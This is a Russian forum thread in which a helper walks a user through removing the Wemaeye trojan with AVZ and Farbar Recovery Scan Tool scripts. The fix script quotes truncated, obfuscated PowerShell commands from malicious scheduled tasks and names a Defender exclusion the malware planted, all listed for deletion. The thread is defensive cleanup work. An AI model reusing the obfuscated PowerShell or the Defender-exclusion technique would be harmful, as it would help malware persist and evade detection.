Перейти к содержанию

Троян wemaeye постоянно создает dll файлы.


Рекомендуемые сообщения

Здравствуйте!

 

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

begin
 DeleteSchedulerTask('Microsoft\Windows\International\International');
 DeleteSchedulerTask('Microsoft\Windows\MUI\1064552239');
 DeleteSchedulerTask('Microsoft\Windows\MUI\1539735123');
 ExecuteRepair(13);
RebootWindows(false);
end.

 

Компьютер перезагрузится.

 

Для повторной диагностики запустите снова AutoLogger. Прикрепите новый CollectionLog.

Ссылка на сообщение
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на сообщение
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    SystemRestore: On
    CreateRestorePoint:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
    Task: {6806D79F-D009-4FBF-A54C-C5BDA6E41DA6} - System32\Tasks\Microsoft\Windows\MUI\818576431 => powershell.exe -c "ypKPT;jKnYGBboo;ijTVlBSG;NUpmx;XrtkifCTU;nOuVZAnl;$BqgEf='oyceBX)zwAxaEWcEJmYaqNvlwxBN.tK(wJizPE';$UcSDn=$BqgEf[34]+$BqgEf[3]+$BqgEf[10];$IcgqM='m&(]gc_m vA*_-T_y*9).5Naame_ (8''2_us{5iwn,9g ljS8y=/st_(ejm17;u_.s0i1ongfo _Slrysm_tmewhm.{_I5O6!;u.asxi__ng+_ _Sa?ys1(t_e__m.{oR,urent)wi-mvne.c_Icn{ (запись имеет ещё 2571 символов).
    Task: {E65F4DBB-99E9-4BB6-8946-FB7D917087EA} - System32\Tasks\Microsoft\Windows\MUI\171323208 => powershell.exe -c "bxJThb;ATn;obh;GwS;$EpUV='LKlWeELB)qxqlcuzLIaNlfI.rftT(DziFPf';$Jdnzi=$EpUV[31]+$EpUV[4]+$EpUV[10];$UkAyS='i&(mgc6m _A*{-Thy*_).pNakmey (]''!nusn5inn_lg w7Siy_?st?je4mc{;u_jsoicjng_k _Skdys9/teeyum.67I8O.0;un6s_i_kng-+ eSatysz_t_e_em.ttR_ur_nt_li5mc4e.olI/n]8tej9rfo5epS_yerru)viu[c3eifs;6+u_sv_i (запись имеет ещё 2409 символов).
    AlternateDataStreams: C:\Windows\tracing:? [16]
    AlternateDataStreams: C:\Users\CRVBe\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
    AlternateDataStreams: C:\Users\CRVBe\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
    AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [7026]
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

Еще один небольшой скрипт выполните в безопасном режиме, пожалуйста:

 

 

  • Выделите следующий код:
    Start::
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\ProgramData\Windows
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

 

 

Сообщите что с проблемой.

Ссылка на сообщение
Поделиться на другие сайты

Хорошо, в завершение:

 

1.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10/11)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

  • Похожий контент

    • Dexter84
      От Dexter84
      Добрый день.
      Проблема появилась спонтанно, утром включил комп и увидел такое на рабочем столе (скрин). Исчезли все системные ярлыки, thumbnail'ы фотографий и прочее. Отовсюду - из всех каталогов и контекстных меню. 
      В процессе исследования выяснилось что блокируются загрузки в яндекс.браузере (но что-то получилось загрузить через Opera, а Autologger - только с помощью TOR). Также невозможно зайти в свойства файлов/папок.
      Прошёлся последовательно: NOD32, Cureit!, ADWcleaner, KVRT. Каждый нашёл что-то своё, удалил/закарантинил, но проблемы это не решило.

      Левых ресурсов не посещал, тем более ничего из непроверенных источников не скачивал.

      Выручайте пожалуйста, работать невозможно.
      CollectionLog-2022.06.29-15.47.zip
    • Konder
      От Konder
      После того как очередной раз включил ноутбук, антивирус стал жаловатся на троян wemaeye.A . doctor web и microsoft defender ничо ему сделать не смогли. Попробовал удалить его в ручную но в папке в которой судя по анти вирусу он должен был находится ничо не нашёл хотя у меня должны показоватся даже скрытые файлы. Что мне делать? И как победить этот несчатсный троян?
          CollectionLog-2022.06.27-11.42.zip
    • Emereyn
      От Emereyn
      Wemaeye.A в папке C:\Windows\Temp создает dll файлы через каждые 10-25 минут. 
      CollectionLog-2022.06.26-22.21.zip
    • JohnJohnson
      От JohnJohnson
      Привет! Подхватил майнер, уже знаю откуда, больше не подхвачу. Прогнал через dr web cureit, он несколько файлов нашёл и удалил, но майнер остался. Потом пошёл через AutoLogger, там в планировщке 3 файла вредоносного скрипта в powershell. Я сделал скрипт для удаления, ввёл его в АВЗ, ребутнул компьютер. Потом снова прогнал через AutoLogger, там эти файлы всё равно остались. Видимо, что-то ещё нужно добавить в скрипт. Тут я уже не компетентен(

      Заранее большое спасибо!
      CollectionLog-2022.06.25-23.31.zip
    • Сергей 2022
×
×
  • Создать...